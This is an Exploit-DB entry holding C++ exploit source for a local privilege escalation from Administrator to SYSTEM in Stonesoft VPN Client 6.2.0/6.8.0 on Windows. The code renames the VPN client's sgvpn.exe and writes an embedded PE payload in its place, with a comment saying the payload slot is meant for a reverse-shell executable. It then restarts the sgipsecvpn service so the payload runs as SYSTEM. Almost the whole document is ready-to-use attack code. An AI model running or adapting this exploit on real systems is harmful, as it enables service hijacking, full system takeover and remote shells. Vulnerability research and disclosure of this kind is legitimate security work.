Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation

EDB-ID:

51341

CVE:

N/A




Platform:

Windows

Date:

2023-04-08


# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation 
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/ 
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM

#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>

using namespace std;
enum Result
{
    unknown,
    serviceManager_AccessDenied,
    serviceManager_DatabaseDoesNotExist,
    service_AccessDenied,
    service_InvalidServiceManagerHandle,
    service_InvalidServiceName,
    service_DoesNotExist,
    service_Exist
};

Result ServiceExists(const std::wstring& serviceName)
{
    Result r = unknown;

    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);

    if (manager == NULL)
    {
        DWORD lastError = GetLastError();

        if (lastError == ERROR_ACCESS_DENIED)
            return serviceManager_AccessDenied;
        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
            return serviceManager_DatabaseDoesNotExist;
        else
            return unknown;
    }

    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);

    if (service == NULL)
    {
        DWORD error = GetLastError();

        if (error == ERROR_ACCESS_DENIED)
            r = service_AccessDenied;
        else if (error == ERROR_INVALID_HANDLE)
            r = service_InvalidServiceManagerHandle;
        else if (error == ERROR_INVALID_NAME)
            r = service_InvalidServiceName;
        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
            r = service_DoesNotExist;
        else
            r = unknown;
    }
    else
        r = service_Exist;

    if (service != NULL)
        CloseServiceHandle(service);

    if (manager != NULL)
        CloseServiceHandle(manager);

    return r;
}

bool ChangeName() {
    LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
    LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
    bool success = MoveFile(parrentvpnfilename, newName);
    if (success) {
        cerr << "[+] SVGVPN filename changed.\n";
    }
    else {
        cerr << "Failed to rename file \n";
    }
    return 0;
}

int main() {

    const uint8_t shellcode[7168] = {
        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    }; //You can set array bin of your reverse shell PE file here

    std::wstring serviceName = L"sgipsecvpn";
    Result result = ServiceExists(serviceName);
    if (result == service_Exist)
        std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
    else if (result == service_DoesNotExist)
        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
    else
        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
    ChangeName();
    HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
    if (fileHandle == INVALID_HANDLE_VALUE) {
        cerr << "Failed to create shellcode\n";
        return 1;
    }

    DWORD bytesWritten;
    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
        cerr << "Failed to write to file\n";
        CloseHandle(fileHandle);
        return 1;
    }
    CloseHandle(fileHandle);

    cout << "[+] Payload exported to ForcePointVPN \n";
    Sleep(30);
    cout << "[+] Restart ForcePointVPN Service \n";
    SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);

    SERVICE_STATUS serviceStatus;
    QueryServiceStatus(serviceHandle, &serviceStatus);
    if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
        ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
        while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
            QueryServiceStatus(serviceHandle, &serviceStatus);
            Sleep(1000);
        }
    }
    StartService(serviceHandle, NULL, NULL);

    CloseServiceHandle(serviceHandle);
    CloseServiceHandle(scmHandle);

    return 0;
}